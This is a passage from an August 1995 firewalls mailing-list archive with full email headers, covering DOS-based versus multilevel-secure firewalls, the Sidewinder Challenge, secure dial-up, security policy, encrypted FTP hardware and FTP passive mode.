\__________________________________________\/ Fax 704.523.7764 From firewalls-owner Thu Aug 10 11:46:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA02299 for firewalls-outgoing; Thu, 10 Aug 1995 11:07:58 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA02244 for ; Thu, 10 Aug 1995 11:07:47 -0700 Received: from kant.newsedge.com(192.206.82.2) by miles via smap (V1.3) id sma002222; Thu Aug 10 11:07:10 1995 Received: from herne.newsedge.com by newsedge.com (4.1/SMI-4.1) id AA20592; Thu, 10 Aug 95 14:01:59 EDT Date: Thu, 10 Aug 95 14:08:51 EST Message-Id: <9508101408.AA16324@herne.newsedge.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: "Chris Brenton" Reply-To: X-Sender: To: Subject: Re: Multilevel Security is good for firewalls X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In reply to: > There's an outfit that builds a firewall running on DOS. >When I first heard of it, I thought the idea was ridiculous, but >in retrospect it's actually a really clever idea! There's no sendmail >to worry about ("multitasking? Huh?") no network daemons, no NFS, >no spending hours vetting your UNIX config to see what nonsense >the vendor left there, etc, etc. If the firewall process crashes, >the system instantly becomes inoperative. Pretty clever, really. >Basically, you accept the fact that the firewall is a special purpose >machine and treat it accordingly. > I'd rather run DOS than B1, and frankly, I suspect a DOS >box running a single program that just manages IP firewalling is a >hell of a lot harder to break into than a CMW or some kind of UNIX >box running B1. (and a little cheaper and easier to manage) > Any capacity or speed specs on this? From firewalls-owner Thu Aug 10 12:00:47 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA03564 for firewalls-outgoing; Thu, 10 Aug 1995 11:30:17 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA03506 for ; Thu, 10 Aug 1995 11:30:09 -0700 Received: from beach.sctc.com(192.55.214.50) by miles via smap (V1.3) id sma003485; Thu Aug 10 11:29:38 1995 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id NAA24555 for ; Thu, 10 Aug 1995 13:35:53 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id NAA24551 for ; Thu, 10 Aug 1995 13:35:52 -0500 Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id NAA15699 for ; Thu, 10 Aug 1995 13:28:33 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id NAA26177; Thu, 10 Aug 1995 13:28:32 -0500 From: Rick Smith Message-Id: <199508101828.NAA26177@shade.sctc.com> Subject: Sidewinder Rumor Control (sorry!) To: firewalls@greatcircle.com Date: Thu, 10 Aug 1995 13:28:31 -0500 (CDT) Cc: smith@sctc.com X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 550 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry folks, I was misinformed. We have _never_ sent out a Sidewinder jacket to a Challenge participant, not even for the guy who came so close. The powers that were at the time decided against it after all. If you see someone in a Sidewinder jacket, it's probably Earl or some other member of the team who set up the Challenge. Please direct comments to us and not to the list unless you really require the attention of the Firewalls community. I thank Brent and everyone for their patience. Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Aug 10 12:10:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA02951 for firewalls-outgoing; Thu, 10 Aug 1995 11:19:06 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA02909 for ; Thu, 10 Aug 1995 11:18:59 -0700 Received: from beach.sctc.com(192.55.214.50) by miles via smap (V1.3) id sma002895; Thu Aug 10 11:18:49 1995 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id NAA24246; Thu, 10 Aug 1995 13:25:01 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id NAA24227; Thu, 10 Aug 1995 13:25:00 -0500 Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id NAA15281; Thu, 10 Aug 1995 13:17:41 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id NAA26039; Thu, 10 Aug 1995 13:17:39 -0500 From: Rick Smith Message-Id: <199508101817.NAA26039@shade.sctc.com> Subject: Re: s[id]ewinder To: mjr@iwi.com Date: Thu, 10 Aug 1995 13:17:39 -0500 (CDT) Cc: smith@sctc.com (Rick Smith), firewalls@greatcircle.com In-Reply-To: <199508101428.KAA13372@switchblade.iwi.com> from "Marcus J. Ranum" at Aug 10, 95 10:28:54 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 675 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > That's one of the hazards of doing bogus challenges. My heart > bleeds. I wasn't looking for sympathy, just observing what I found to be the most surprising property of the experience. I think it's an interesting commentary on The World Out There that customers are more impressed by the Sidewinder Challenge as evidence of effective security than they are in the SMG's formal assurance. I don't know what the actual ratio is of cost-per-bugs-found for each, but they're both steep. Formal assurance finds lots more bugs, but it costs more, too. Really represents both ends of the security assurance spectrum, eh? Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Aug 10 12:33:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA00857 for firewalls-outgoing; Thu, 10 Aug 1995 10:42:36 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA00804 for ; Thu, 10 Aug 1995 10:42:29 -0700 Received: from dialup.oar.net(131.187.1.130) by miles via smap (V1.3) id sma000793; Thu Aug 10 10:42:18 1995 Received: from inetgate.scitexdpi.com for ballison@scitexdpi.com by dialup.oar.net (8.6.10/931123.1402) id NAA06471; Thu, 10 Aug 1995 13:40:13 -0400 Received: by inetgate.scitexdpi.com id AA10450 (5.67b/IDA-1.5 for ); Thu, 10 Aug 1995 13:40:57 -0400 Received: from mailhub.scitexdpi.com(172.16.9.23) by inetgate via smap (V1.3) id sma010448; Thu Aug 10 13:40:49 1995 Received: from mailhub.scitexdpi.com by mailhub with SMTP id AA02629 (5.67b/IDA-1.5 for ); Thu, 10 Aug 1995 13:37:32 -0400 Received: from sdphq-Message_Server by mailhub.scitexdpi.com with Novell_GroupWise; Thu, 10 Aug 1995 13:37:30 -0400 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Thu, 10 Aug 1995 13:40:31 -0400 From: Bob Allison To: firewalls@greatcircle.com Subject: Secure Dialup Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have seen this topic discussed a few times, but have not seen the kind of answer I am looking for, so... (don't flame me if I missed something, just kindly point me to the source of the error) I have been instructed to get some in-bound modems available. The main use of these modems will be for employees to access their network files from either home or a customer site. This means I will need NFS, which also means that these modems must be inside the firewall. Assuming that several of you experts (and the rest of you too) have installed a secure modem pool. I would like some pointers: which products are good, which are not so good, difficulty to set up and administer, etc. Since I do not have any information at present, I would also appreciate contact information if possible. To avoid a lot of extra bandwidth, please reply directly to me. As I make my summary for presentation to management, I will also post a copy to the list (probably about a week or two from now). Thanks in advance to everyone for the help! -- To contact me (in order of decreasing reliability): E-Mail: bob.allison@scitexdpi.com Phone Mail: +1 513 259 3629 (I'm often out helping users) FAX "Mail": +1 513 259 3291 Snail Mail: Bob Allison SCITEX Digital Printing, Inc. 3100 Research Blvd. Dayton, OH 45420-4099 88 ____ "" ,d / /\ \ 88 / / \ \ ,adPPYba, ,adPPYba, 88 MM88MMM ,adPPYba, 8b, ,d8 \ \ / / I8[ "" a8" "" 88 88 a8P_____88 `Y8, ,8P' __\ \/ /__ `"Y8ba, 8b 88 88 8PP""""""" )888( / // /\ \\ \ aa ]8I "8a, ,aa 88 88, "8b, ,aa ,d8" "8b, /_//_/ \_\\_\ `"YbbdP"' `"Ybbd8"' 88 "Y888 `"Ybbd8"' 8P' `Y8 From firewalls-owner Thu Aug 10 12:33:57 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA05064 for firewalls-outgoing; Thu, 10 Aug 1995 11:56:37 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA05013 for ; Thu, 10 Aug 1995 11:56:29 -0700 Received: from gatekeeper.ddp.state.me.us(141.114.130.70) by miles via smap (V1.3) id sma005002; Thu Aug 10 11:56:21 1995 Received: from localhost by gatekeeper.ddp.state.me.us (8.6.5/1.37) id OAA00336; Thu, 10 Aug 1995 14:48:36 -0400 Date: Thu, 10 Aug 1995 14:48:35 -0400 (EDT) From: David Miller Subject: Re: Multilevel Security is good for firewalls To: Chris Brenton cc: firewalls@GreatCircle.COM In-Reply-To: <9508101408.AA16324@herne.newsedge.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 10 Aug 1995, Chris Brenton wrote: > In reply to: > > > There's an outfit that builds a firewall running on DOS. > >When I first heard of it, I thought the idea was ridiculous, but > >in retrospect it's actually a really clever idea! There's no sendmail > >to worry about ("multitasking? Huh?") no network daemons, no NFS, > >no spending hours vetting your UNIX config to see what nonsense No interrupts, no 32 bit programming, no memory protection from errant pointers.... > >the vendor left there, etc, etc. If the firewall process crashes, > >the system instantly becomes inoperative. Pretty clever, really. > >Basically, you accept the fact that the firewall is a special purpose > >machine and treat it accordingly. I'm not opposed to the theory, just wondering if it's necessary to stoop that low. One of the advantages of Unix is the environment it gives the proxies to run in - memory protection among the different processed, a preemptive scheduler, built in robust tcp, etc. etc., all of which are a lot of work to recreate. Unless, of course, you like programming in a microcode environment? > > I'd rather run DOS than B1, and frankly, I suspect a DOS > >box running a single program that just manages IP firewalling is a > >hell of a lot harder to break into than a CMW or some kind of UNIX > >box running B1. (and a little cheaper and easier to manage) True, if you're talking about a packet filter that is a single process deciding in a single threaded manner whether to forward a packet or not. I'm not sure the fwtk style proxies map onto this model very well, whether the transparent breed or not. > > Any capacity or speed specs on this? Padgett? You've done this kind of stuff already, right? --- David ---------------------------------------------------------------------------- It's *amazing* what one can accomplish when one doesn't know what one can't do! From firewalls-owner Thu Aug 10 13:24:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA03603 for firewalls-outgoing; Thu, 10 Aug 1995 11:31:12 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA03588 for ; Thu, 10 Aug 1995 11:31:08 -0700 Received: from mercury.sun.com(192.9.25.1) by miles via smap (V1.3) id sma003498; Thu Aug 10 11:30:10 1995 Received: from Eng.Sun.COM by mercury.Sun.COM (Sun.COM) id LAA06092; Thu, 10 Aug 1995 11:27:43 -0700 Received: from olympics.Eng.Sun.COM by Eng.Sun.COM (5.x/SMI-5.3) id AA26978; Thu, 10 Aug 1995 11:27:38 -0700 Received: by olympics.Eng.Sun.COM (SMI-8.6/CRAY-5.1) id LAA03461; Thu, 10 Aug 1995 11:18:11 -0700 Date: Thu, 10 Aug 1995 11:18:11 -0700 From: Brad.Powell@Eng.Sun.COM (Brad Powell) Message-Id: <199508101818.LAA03461@olympics.Eng.Sun.COM> To: mjr@iwi.com, bdboyle@maverick.erenj.com Subject: Re: s[id]ewinder Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From firewalls-owner@GreatCircle.COM Thu Aug 10 10:59:37 1995 >From: "Bryan D. Boyle" >> Subject: Re: s[id]ewinder Bryan writes: >of course not. The fact that no one has publically >broken it indicates: > >1) no one really cares and has other things to do with limited time. > >2) The challenge is that there really is no message, and finding that out > is the key > >3) the people you are trying to protect against aren't interested in proving > a company's marketing claims. >Not being broken does not, ipso facto, indicate that the system is secure. >It can also indicate that there was not a concerted effort to do so. I'd add a fourth bullet to this list. 4) The crackers are not advertising that they know how to break into since its in *their* best interest to get _everyone_ using so that some "interesting" sites will be vunerable. No I'm not posting FUD :-) What I'm trying to say that you can't prove something "secure" by these methods, only prove its insecure. It would take a code review to prove secure, and then only if the reviewers knew exactly what they were doing and were infalable. Pretty high hurdle to jump eh... I would at least like to see statements (for any products; I'm not limiting or picking on any particular product here) along the lines of "PRODUCT has been testd against the following attacks and proven to not be suseptable to them" (and additionally detected and logs the attack) ======================================================================= Brad Powell : brad.powell@Sun.COM Sr. Network Security Consultant SunNetworks, Sun Microsystems Inc. ======================================================================= The views expressed are those of the author and may not reflect the views of Sun Microsystems Inc. ======================================================================= From firewalls-owner Thu Aug 10 13:39:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA07659 for firewalls-outgoing; Thu, 10 Aug 1995 12:35:29 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA07595 for ; Thu, 10 Aug 1995 12:35:16 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma007544; Thu Aug 10 12:35:09 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA12845; Thu, 10 Aug 95 15:29:45 -0400 Date: Thu, 10 Aug 95 15:29:44 -0400 Message-Id: <9508101929.AA12845@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Multiprocessor firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Firewalls are *NOT* general purpose computing engines. Padgett >has suggested building firewalls out of 386SXs: one for each proxy >service! Bit of a caveat here. Mention was made of DOS. The nice thing about DOS is that means exist to set it aside when the application begins and you can use "something else". Windows does this. The SERVER.EXE that starts Novell Netware from a DOS partition does this. For that you do not even need DOS, the BIOS provides all of the hooks you need - have written a number of programs this way and this is how the original "Flight Simulator" from Microsoft ran. Warmly, Padgett From firewalls-owner Thu Aug 10 13:40:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA06937 for firewalls-outgoing; Thu, 10 Aug 1995 12:27:04 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA06896 for ; Thu, 10 Aug 1995 12:26:57 -0700 Received: from gateway.damark.com(204.17.145.230) by miles via smap (V1.3) id sma006847; Thu Aug 10 12:26:36 1995 Received: by gateway.damark.com; id OAA05122; Thu, 10 Aug 1995 14:21:39 -0500 Received: from sco.damark.com(172.31.254.231) by gateway.damark.com via smap (g3.0.1) id sme005120; Thu, 10 Aug 95 14:21:16 -0500 Received: by damark.com (5.65/1.2-eef) id AA04094; Thu, 10 Aug 95 14:20:09 -0500 Message-Id: <9508101920.AA04094@damark.com> From: "william.wells" To: FIREWALLS Subject: FW: Sample Security Policy? Date: Thu, 10 Aug 95 14:16:00 +6C Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mail from Alan Dowd contained the following: NOT! The security policy can be as simple as "all that is not specifically permitted is forbidden." It's not the policy, it's how you enforce it that _may_ need protection. ... What advantage does this give a potential intruder? What advantage does it give the user? the administrator? (Rhetorical questions; solutions are left to the student.) >> To which I write: I concur. The policy that we have deals with what users are and aren't supposed to do and is pretty much basic stuff. The specific hooks, tracking, and traps we have and/or have added to monitor and enforce the policy. On occasion, I might discuss the user policy but it takes much more for me to discuss the latter. However, if you've never written or seen even a basic policy aimed at users, writing one can be intimidating. My experience is that there are frequently 2 related documents: one for users and one for administrators; the difference is that one is conceptual ("passwords must be 6 or more characters") and one is procedural ("set this value to ... in this file"). From firewalls-owner Thu Aug 10 13:57:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11168 for firewalls-outgoing; Thu, 10 Aug 1995 13:18:37 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11146 for ; Thu, 10 Aug 1995 13:18:31 -0700 Received: from milkyway.com(198.53.167.2) by miles via smap (V1.3) id sma011104; Thu Aug 10 13:18:17 1995 Received: from jupiter.milkyway.com (jupiter.milkyway.com [192.168.77.9]) by internet with ESMTP (DuhMail/2.0) id QAA08547; Thu, 10 Aug 1995 16:18:51 -0400 Received: from metis.milkyway.com (mcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.12/8.6.12) with ESMTP id QAA24274 for ; Thu, 10 Aug 1995 16:14:30 -0400 Received: by metis.milkyway.com (8.6.9/BSDI-Client) id QAA15556; Thu, 10 Aug 1995 16:27:00 -0400 To: firewalls@greatcircle.com Path: not-for-mail From: mcr@milkyway.com (Michael Richardson) Newsgroups: milkyway.mail.firewalls Subject: Re: s[id]ewinder Date: 10 Aug 1995 16:26:59 -0400 Organization: Milkyway Networks Corporation, Ottawa, ON Lines: 17 Distribution: milkyway Message-ID: <40dq2j$f62@metis.milkyway.com> References: <9508101148.ZM18768@maverick.erenj.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <9508101148.ZM18768@maverick.erenj.com>, Bryan D. Boyle wrote: >1) no one really cares and has other things to do with limited time. > >2) The challenge is that there really is no message, and finding that out > is the key I suspect #2. How do I know there is even a network behind the firewall? Or that the firewall ever passes *ANY* data through it? It isn't hard to protect an Atari 800 with a BNC connector taped to the side. -- :!mcr!: | Milkyway Networks Corporation Michael Richardson | Makers of the Black Hole firewall NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com Home: mcr@sandelman.ocunix.on.ca. PGP key available. From firewalls-owner Thu Aug 10 14:39:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA13069 for firewalls-outgoing; Thu, 10 Aug 1995 14:00:44 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA13030 for ; Thu, 10 Aug 1995 14:00:38 -0700 Received: from news.ti.com(192.94.94.33) by miles via smap (V1.3) id sma013021; Thu Aug 10 14:00:34 1995 Received: from tlsun5a.itg.ti.com ([128.247.21.237]) by gate.ti.com (8.6.12/) with ESMTP id PAA18345 for ; Thu, 10 Aug 1995 15:59:27 -0500 Received: from dsk92.itg.ti.com (dsk92.itg.ti.com [128.247.187.97]) by tlsun5a.itg.ti.com (8.6.12/8.6.11) with ESMTP id PAA27969 for ; Thu, 10 Aug 1995 15:59:27 -0500 Received: (from bill@localhost) by dsk92.itg.ti.com (8.6.9/8.6.9) id PAA04754 for Firewalls@GreatCircle.COM; Thu, 10 Aug 1995 15:58:51 -0500 From: Bill Petersen Message-Id: <199508102058.PAA04754@dsk92.itg.ti.com> Subject: Re: Encripted ftp connections To: Firewalls@GreatCircle.COM Date: Thu, 10 Aug 1995 15:58:51 -0600 (CDT) In-Reply-To: <199508101934.MAA07537@miles.greatcircle.com> from "firewalls-digest-owner@GreatCircle.COM" at Aug 10, 95 12:34:42 pm Company: Texas Instruments Inc. Address: 6550 Chase Oaks Blvd., MS 8467, Plano, TX 75023 Phone: 214-575-5437 FAX: 214-575-4853 Reply-To: brp@ti.com X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 2542 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: Atkinson-K@smtpgw.nctsw.navy.mil > Date: Thu, 10 Aug 1995 09:54:40 -0400 > Subject: Encripted ftp connections > > Lyndon David wrote: > > >I have been tasked with setting up an ftp server to > >communicate with a handfull of business partners. We > >wish to have the ability for our partners to be able > >to send and retrieve files from our server. Due to the > >nature of the data the data must be encripted as it passes > >over the Internet and stong authentication must be used > >when they connect. > > >This is a commercial project and the data will cross > >International bounderies, for this reason I do not want > >to use encription technology such as pgp as some of the > >countries will have problems with this. > > >Does anyone know of a hardware solution that can operate > >between one local machine and 5 or 6 remote machines? > > The Message Security Protocol (don't recall the International Standard name > for it) will provide the strong authentication and one to many requirements > you have, but only for messages. In an international environment, you will > have problems with just about any encryption capability you choose. > > >If encription of the data before transmission is mandated > >what commercial encription can be used that will be > >acceptable across International boarders and can anyone > >think of a method where if someone forgot to encript the > >data before transmission this would be caught and the > >transfer stopped? > > There are Guards that will be coming available that will prevent > unencrypted information from leaving an enclave and passing over a Network. > - ------------------------------ There is a box put out by a company named Semaphore called an Neu - network encryption unit. It will do just what you want and is approved for export to several countries. You can, but ip/hwdr addr choose whether host A will talk to host B encrypted or in the clear. Semaphore Communications Corporation 2040 Martin Avenue, Santa Clara, CA 95050, FAX 408-980-7769, Dave Thomsen 408-980-7770 (name/number is 1 yr old) thomsen@netcom.com Regards, Bill ---------------------------------------------------------------------------- Bill Petersen email: brp@ti.com Enterprise Computing Provisioning voice: 214-575-5437 Texas Instruments, Inc. Plano Texas fax: 214-575-4853 ---------------------------------------------------------------------------- From firewalls-owner Thu Aug 10 15:00:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11052 for firewalls-outgoing; Thu, 10 Aug 1995 13:16:35 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11015 for ; Thu, 10 Aug 1995 13:16:29 -0700 Received: from beach.sctc.com(192.55.214.50) by miles via smap (V1.3) id sma010998; Thu Aug 10 13:15:51 1995 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id PAA28675 for ; Thu, 10 Aug 1995 15:22:02 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id PAA28667 for ; Thu, 10 Aug 1995 15:22:00 -0500 Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id PAA20276; Thu, 10 Aug 1995 15:14:37 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id PAA29388; Thu, 10 Aug 1995 15:14:36 -0500 From: Rick Smith Message-Id: <199508102014.PAA29388@shade.sctc.com> Subject: Re: Multilevel Security is good for firewalls To: firewalls@greatcircle.com Date: Thu, 10 Aug 1995 15:14:36 -0500 (CDT) Cc: smith@sctc.com (Rick Smith) X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1315 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus writes: > There's an outfit that builds a firewall running on DOS. >When I first heard of it, I thought the idea was ridiculous, but >in retrospect it's actually a really clever idea! There's no sendmail >to worry about ("multitasking? Huh?") no network daemons, ... But outsiders must access these services somehow or other. If the outsiders can send in data, then there are risks of bugs like the httpd overrun hack or Morris' finger. On a DOS system, such a bug immediately gives the attacker your server machine, firewall or not. On Unix the guy at least has to bust down a few more barriers. On a system with multilevel security or type enforcement, they face a pretty serious barrier. I'm not confident that state of the art server software will always be bug free or written with a trained eye towards security issues. So the "trustworthy" version of a service is always going to lag the market overall. MLS and TE are tools that let us use existing implementations with less risk. I'm not sure if this places these servers "on the firewall" or on some other unspecified element of the controlled perimeter. This discussion is leading in directions that make it hard to tell what security objective a "firewall" is supposed to achieve. Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Aug 10 15:04:57 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA14855 for firewalls-outgoing; Thu, 10 Aug 1995 14:44:00 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA14816 for ; Thu, 10 Aug 1995 14:43:54 -0700 Received: from gatekeeper2.mcimail.com(192.147.45.10) by miles via smap (V1.3) id sma014810; Thu Aug 10 14:43:14 1995 Received: from mailgate2.mcimail.com (mailgate2.mcimail.com [166.38.40.100]) by gatekeeper2.mcimail.com (8.6.12/8.6.10) with SMTP id VAA08973; Thu, 10 Aug 1995 21:41:22 GMT Received: from mcimail.com by mailgate2.mcimail.com id ae26094; 10 Aug 95 21:39 WET Date: Thu, 10 Aug 95 16:38 EST From: "Kevin J. McMahon" <0003557428@mcimail.com> To: Firewalls Subject: Re: s[id]ewinder Message-Id: <35950810213853/0003557428DC4EM@MCIMAIL.COM> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus Ranum wrote: > >Question: > Will SCC pay out if the message is broadcast REGARDLESS of the >means by which it is discovered? Careful how you answer. :) > Answer... there are no technical solutions for social engineering. From firewalls-owner Thu Aug 10 15:11:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11167 for firewalls-outgoing; Thu, 10 Aug 1995 13:18:36 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA11120 for ; Thu, 10 Aug 1995 13:18:29 -0700 Received: from scifi.emi.net(204.181.45.10) by miles via smap (V1.3) id sma011103; Thu Aug 10 13:18:08 1995 Received: (from njs@localhost) by scifi.maid.com (8.6.11/8.6.9) id QAA13971; Thu, 10 Aug 1995 16:16:30 -0400 Date: Thu, 10 Aug 1995 16:16:23 -29900 From: Nick Simicich Subject: Re: Netscape's FTP through a Firewall To: "Charles L. Hutson" cc: firewalls@GreatCircle.COM In-Reply-To: <9508101528.AA21060@nexus.ptech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 10 Aug 1995, Charles L. Hutson wrote: > I'm having a problem using Netscape to FTP through my Firewall-1 firewall. > I've done quite a bit of testing and research and have figured out that > its because Netscape's version of ftp adheres to the specifications of > RFC 1579. This RFC states that instead of doing a PORT command to tell > the ftp server what port to open a data connection on, it does a PASV > command. The following quote is from the above RFC: > > Fortunately, the necessary mechanisms already exist in the protocol. > If the client sends a PASV command, the server will do a passive TCP > open on some random port, and inform the client of the port number. > The client can then do an active open to establish the connection. > > This is the part that confuses me. If the server is going to inform > my client of the port number "on some random port", 1) How am I going > to know which port to listen on to get this critical information? It > seems like my ftp client would have to be frantically scanning the > entire range above 1024 to get this information. 2) Isn't > this going to force me to leave the entire range above 1024 wide open > in my firewall configuration? The reply to the pasv message is of a parsable format. Here is a log of such a session. Numbered lines are from the server. -=-=-=-=- user anonymous 331 Guest login ok, send e-mail address as password. pass njs@scifi 230 Guest login ok, access restrictions apply. pasv 227 Entering Passive Mode (127,0,0,1,6,222) -=-=-=-=- This tells me that I should initiate the next data connection to 127.0.0.1, port 1758, The 6 is the first octet of the port number, and the 222 is the second octet, in network order. So the client knows exactly which ip address and port to open the connection to. This is done so that I, as a client, can open the connection, and eliminates the usual FTP problem of needing to allow incoming connections to high ports that you run into when you use the ports command. It also allows netscape to easily work with IP Masquerading at the client end. > As it stands, I can't FTP through Netscape because my firewall blocks > that incomming random packet. Can anyone provide any suggestions. It is more likely that your firewall only allows outgoing connections to certain ports, and not to the range of ports above 1024. -- Nick Simicich - njs@scifi.emi.net - (last choice) njs@bcrvm1.vnet.ibm.com http://scifi.emi.net/njs.html -- Stop by and Light Up The World! From firewalls-owner Thu Aug 10 15:25:53 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA09809 for firewalls-outgoing; Thu, 10 Aug 1995 13:06:22 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA09747 for ; Thu, 10 Aug 1995 13:06:10 -0700 From: elivermore@gw.lsli.com Received: from lsli.sccsi.com(198.65.130.22) by miles via smap (V1.3) id sma009690; Thu Aug 10 13:05:53 1995 Received: by gw.lsli.com (AIX 3.2/UCB 5.64/4.03) id AA10750; Thu, 10 Aug 1995 14:58:48 -0500 Received: by gw.lsli.com via smwrap (PORTUS 2.0) id smwrapOvsAK1; Thu Aug 10 14:57:44 1995 id AA18037; Thu, 10 Aug 1995 14:58:23 -0500 Date: Thu, 10 Aug 95 15:01:40 PDT Subject: Announce: change in LSLI/PORTUS url To: firewalls@greatcircle.com X-Mailer: Chameleon ARM_55, TCP/IP for Windows, NetManage Inc. Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is to inform everyone that the URL for our web site with information about the PORTUS firewall and our on-line firewall tutorial has changed. the new URL is http://www.lsli.com Its short. Its sweet. Its so 90's. ------------------------------------- Ellana Livermore Livermore Software Laboratories, Inc. 713-496-1580 800-240-5754 FAX: 713-496-6356 elivermore@gw.lsli.com http://www.lsli.com Most people don't know there are angels whose only job is to make sure you don't get too comfortable & fall asleep & miss your life. (Brian Andreas) -------------------------------------------------- 08/10/95 15:01:40 From firewalls-owner Thu Aug 10 15:31:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA16291 for firewalls-outgoing; Thu, 10 Aug 1995 15:10:19 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA16273 for ; Thu, 10 Aug 1995 15:10:14 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma016228; Thu Aug 10 15:10:09 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA13354; Thu, 10 Aug 95 18:01:22 -0400 Date: Thu, 10 Aug 95 18:01:21 -0400 Message-Id: <9508102201.AA13354@uvs1.orl.mmc.com> From: 